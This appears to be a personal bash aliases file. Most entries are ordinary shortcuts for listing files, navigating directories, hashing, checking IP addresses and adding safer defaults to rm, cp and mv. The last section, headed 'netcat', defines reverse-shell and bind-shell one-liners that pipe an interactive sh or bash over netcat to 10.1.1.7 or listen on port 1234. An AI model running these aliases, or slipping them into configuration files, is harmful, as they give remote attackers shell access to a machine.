#http://askubuntu.com/questions/22037/aliases-not-available-when-using-sudo
alias sudo="sudo "
alias ports='netstat -tulanp'
alias now='date +"%T"'
alias nowtime='now'
alias nowdate='date +"%d-%m-%Y"'
alias checksum='rhash -r --md5 -p "%h, %p\n"'
alias beep='echo -e "\a\c"'
alias beep-lots='while :; do beep; sleep 1; done'

### Enhanced commands ###
alias ls="ls -hp --color=auto"
alias ll='ls -la'
alias l.='ls -d .* '                                                #Show hidden files
alias ldir='ls -d */'
alias ll="ls -la"
alias ls-size="ll -lAS && echo '-------------Smallest-----'"
alias ls-time="ls -lAt && echo '-------------Oldest-----'"
alias mkdir='mkdir -pv'                                             #create parent dirs on demand
alias chown='chown --preserve-root'
alias chmod='chmod --preserve-root'
alias chgrp='chgrp --preserve-root'
alias chmod-setgid='chmod g+s'
alias zip-dir='zip -r'
alias wget='wget -c'                                                #turn on wget resuming
alias wget-local='wget -p -k'
alias curl-follow='curl -O -J -L'
alias rsync-copy="rsync -avhP"
alias screen-name='screen -S'

### Safer commands ###
alias mv='mv -i'
alias cp='cp -i'
alias ln='ln -i'
alias rm='rm -I --preserve-root'

# trims front and back whitespace plus tabs
alias trim='awk '\''{$1=$1};1'\'''
alias fixcut='tr -s " "'

#cd aliases
alias cd..='cd ..'
alias ..='cd ..'
alias ...='cd ../../../'
alias ....='cd ../../../../'
alias .....='cd ../../../../'
alias .4='cd ../../../../'
alias .5='cd ../../../../..'

### openssl shortcuts
alias sha1='openssl sha1'
alias md5='openssl md5'

### Pretty commands
alias vmount='mount |column -t'
alias vpath='echo -e ${PATH//:/\\n}'

### User Definitions ###
# compile with max debugging
alias gcc-dev="gcc -g -Wall -Wextra -Winline"
# Get your current public IP
alias whatismyip="curl icanhazip.com"
alias ipinfo="curl ifconfig.me && curl ifconfig.me/host"
alias ipconfig="nmcli dev list iface eth0 | grep IP4"
# count files in directory
alias dircount='ls -1 | wc -l'
alias webify="mogrify -resize 690\> *.png"
alias most='du -hsx * | sort -rh | head -10'
alias sort-dir-by-size='du -ha --max-depth=1 | sort -h'
alias find_by_name_indir='sudo find . -iname '
alias find_by_name_root='sudo find / -iname '
alias grep_for_text='grep -inrI '

# display top n elements and show ---
alias headtail5="sed -ne'1,4{p;b};5{x;s/$/.../;x;G;p;b};:a;$p;N;11,$D;ba'"
alias headtail10="sed -ne'1,9{p;b};10{x;s/$/.../;x;G;p;b};:a;$p;N;21,$D;ba'"

### Shortcuts ###
alias h='history'
alias c='clear'
alias cls='clear'
alias dc='dircount'

### useless stuff ###
alias busy="cat /dev/urandom | hexdump -C | grep 'ca fe'"

### netcat ###
alias nc-trad-rev='nc -e /bin/sh 10.1.1.7 1234'
alias nc-trad-bind='nc -e /bin/sh -l 1234'
alias nc-trad-rev='nc -e /bin/bash 10.1.1.7 1234'
alias nc-trad-rev='nc -e /bin/bash -l 1234'
alias nc-sh-rev='rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.1.1.7 1234 >/tmp/f'
alias nc-sh-bind='rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -l 1234 >/tmp/f'
alias nc-bash-rev='rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.1.1.7 1234 >/tmp/f'
alias nc-bash-bind='rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -l 1234 >/tmp/f'
